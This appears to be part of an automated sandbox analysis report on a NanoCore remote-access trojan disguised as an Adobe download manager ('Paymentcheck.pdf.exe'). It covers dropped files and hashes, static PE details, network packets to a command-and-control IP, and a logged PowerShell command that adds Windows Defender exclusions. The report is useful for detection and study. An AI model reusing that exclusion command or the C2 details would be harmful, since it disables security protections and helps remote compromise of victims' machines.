                              SHA-512:E8B0F322CC92C23FCF6D57C04E33C08001F867D2F5B2203A1E1EC3BBA06CB4D4A9A3E6D07797C60D849CF4845EA85FD1533366AA07F66708C97CBBE71BD5077B
                              Malicious:true
                              Reputation:unknown
                              Preview: .1?.GV.H
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40
                              Entropy (8bit):5.153055907333276
                              Encrypted:false
                              SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                              MD5:4E5E92E2369688041CC82EF9650EDED2
                              SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                              SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                              SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                              Malicious:false
                              Reputation:unknown
                              Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):327432
                              Entropy (8bit):7.99938831605763
                              Encrypted:true
                              SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                              MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                              SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                              SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                              SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                              Malicious:false
                              Reputation:unknown
                              Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):44
                              Entropy (8bit):4.220128777433188
                              Encrypted:false
                              SSDEEP:3:oNt+kiE2J5xAI0L4A:oNwkn23f0L4A
                              MD5:DEC3CF19509608C057474F6AD7FD7D55
                              SHA1:1829E7C7674B0EB55E32C5D4F57794762CEB62E2
                              SHA-256:BEAEBCA6CB064C7FA901C228281DD1C8A694EF252A178CDF96B9D4E56C4093E9
                              SHA-512:6E258F21C3361168E01C0464DE3C7A100F01E51069F18559BA1280CE9D4302F81B0DF273558EABC165C6547074D74A6C5FDBA86E6841EF3D704F1D43FAD142E7
                              Malicious:false
                              Reputation:unknown
                              Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):486400
                              Entropy (8bit):7.954045447359108
                              Encrypted:false
                              SSDEEP:12288:N/vJVn4mZTs+EWEI69JHelW2Mm3XrtJ7aneX:tMmZTs+qVGWtm35N
                              MD5:B7E3C3C9735D6BA37616D791171FE2DB
                              SHA1:8763C22ED1151EC2C5B584415154EC7E3C50D964
                              SHA-256:91B97FB3F4695FD57C723B537C5B811195F9F99B0AC6033835F75444C36712B9
                              SHA-512:E19725DA6B7673860A1AA22B473FA59C38FC81A989969A11327A708D9289B2695976D3DFE1D6467D429FA3358D5CF0B022C14CA9862CFF68DAE2EEBADEE4C95D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f/...............0..:...0......>X... ...`....@.. ....................................@..................................W..K....`...,........................................................................... ............... ..H............text...D8... ...:.................. ..`.rsrc....,...`.......<..............@..@.reloc...............j..............@..B................ X......H.......`A..\2....../....s..,.............................................(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*.0..C........(....8....8........E........8....*.(.... ....~x...:....& ....8......s....o....*.0.......... ........8........E....7.......G...82....{....9.... ....~....:....& ....8....*..(....8.....{....o....8.....9.... ....~e...:....&8........0.......... ........8........E....Q...................$...8L...."...A"...As....(.... ....8......(.... .
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe:Zone.Identifier
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:unknown
                              Preview: [ZoneTransfer]....ZoneId=0
                              C:\Users\user\Documents\20210803\PowerShell_transcript.377142.Y6wKq0_c.20210803082749.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):944
                              Entropy (8bit):5.321323527131212
                              Encrypted:false
                              SSDEEP:24:BxSA4y7vBZKx2DOXUWM0Viu4muVMzeWkHjeTKKjX4CIym1ZJXfu4muVMzy:BZvvjKoOHUmuakqDYB1Z5mub
                              MD5:82DD5A528149B597B080FDBC21B72677
                              SHA1:D13F18C05FD0FE98A90D68FB2A52A165CCBD8572
                              SHA-256:3982DEA623BA240B8F2DBAAFD89E38EB656FBEE84B72FBAB2F45E0F5D005A41D
                              SHA-512:4C0DBF6F966E4ED438E33464575FFBAFA71B24BF109AAFC8B6D4443327E2CCD70188FF234FE5F4E316731949CFC2F3BF9C0EF9FC6B6F74DF8B70E33FB4ABB20E
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210803082814..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'..Process ID: 6860..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210803082815..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'..
                              \Device\ConDrv
                              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1049
                              Entropy (8bit):4.2989523990568035
                              Encrypted:false
                              SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                              MD5:970EE6AEAB63008333D1D883327DA660
                              SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                              SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                              SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                              Malicious:false
                              Reputation:unknown
                              Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.954045447359108
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:Paymentcheck.pdf.exe
                              File size:486400
                              MD5:b7e3c3c9735d6ba37616d791171fe2db
                              SHA1:8763c22ed1151ec2c5b584415154ec7e3c50d964
                              SHA256:91b97fb3f4695fd57c723b537c5b811195f9f99b0ac6033835f75444c36712b9
                              SHA512:e19725da6b7673860a1aa22b473fa59c38fc81a989969a11327a708d9289b2695976d3dfe1d6467d429fa3358d5cf0b022c14ca9862cff68dae2eebadee4c95d
                              SSDEEP:12288:N/vJVn4mZTs+EWEI69JHelW2Mm3XrtJ7aneX:tMmZTs+qVGWtm35N
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f/...............0..:...0......>X... ...`....@.. ....................................@................................

                              File Icon

                              Icon Hash:4e9292f2c88cd3cc

                              Static PE Info

                              General

                              Entrypoint:0x47583e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0xBB2F66FF [Sun Jul 7 18:05:51 2069 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x757f00x4b.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x2ca0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x738440x73a00False0.979803631757data7.98540121704IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rsrc0x760000x2ca00x2e00False0.146654211957data3.25857363406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x7a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_ICON0x761300x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512
                              RT_GROUP_ICON0x786d80x14data
                              RT_VERSION0x786ec0x3c8data
                              RT_MANIFEST0x78ab40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Version Infos

                              DescriptionData
                              Translation0x0000 0x04b0
                              LegalCopyrightCopyright 2019 Adobe Inc. All rights reserved.
                              Assembly Version2.0.0.592
                              InternalNametopA1.exe
                              FileVersion2.0.0.592
                              CompanyNameAdobe Inc
                              LegalTrademarks
                              CommentsAdobe Download Manager
                              ProductNameAdobe Download Manager
                              ProductVersion2.0.0.592
                              FileDescriptionAdobe Download Manager
                              OriginalFilenametopA1.exe

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              08/03/21-08:27:54.228892TCP2025019ET TROJAN Possible NanoCore C2 60B497712018192.168.2.4217.138.212.57

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 3, 2021 08:27:53.016474009 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:54.099281073 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:54.101644993 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:54.228892088 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:55.107541084 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:55.107676983 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:55.147273064 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:55.147423983 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:55.782269001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:55.784817934 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:56.438827991 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:56.494590044 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:56.504901886 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.155390024 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.183080912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184142113 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184262991 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.184508085 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184701920 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.184794903 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.185137033 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.185631037 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.185904026 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.186058044 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.188045025 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.188126087 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.188519955 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.188623905 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.189238071 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.809499025 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.809520006 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.809655905 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.810545921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.810564041 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.810681105 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.811285973 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.811305046 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.811395884 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.812160015 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813565016 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813584089 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813677073 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.814728975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.814750910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815210104 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815228939 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815304041 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.815321922 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.816252947 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818298101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818317890 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818346977 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.818797112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818813086 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818877935 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.818905115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.820180893 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.820815086 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.821829081 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.422130108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422149897 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422337055 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.422650099 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422662020 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422801018 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.437520027 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.437534094 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438402891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.438420057 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438431978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438498020 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.438925982 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438940048 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438987970 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.440114021 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.441627979 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.441709995 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.442107916 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.442585945 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.442933083 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.442966938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443496943 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443511963 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443984985 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.444008112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.444041967 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.444176912 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.446219921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446244001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446711063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446732044 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447354078 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447375059 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447443962 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.447463989 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.447467089 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.448440075 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449229002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449248075 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449352980 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.449367046 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.450615883 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.450647116 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.450998068 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.451433897 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.451455116 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.451522112 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.454077005 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.455230951 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.455250978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456259012 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.456295967 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456695080 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456707954 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456800938 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.457701921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.457715034 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.457784891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.038724899 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.041696072 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.041709900 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.041829109 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.042579889 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.042597055 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.042670965 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.043169975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.043184042 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.043334007 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.046055079 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.049640894 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.052726984 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.052743912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.052934885 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.054372072 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.054419041 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.054567099 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.063199043 CEST201849771217.138.212.57192.168.2.4
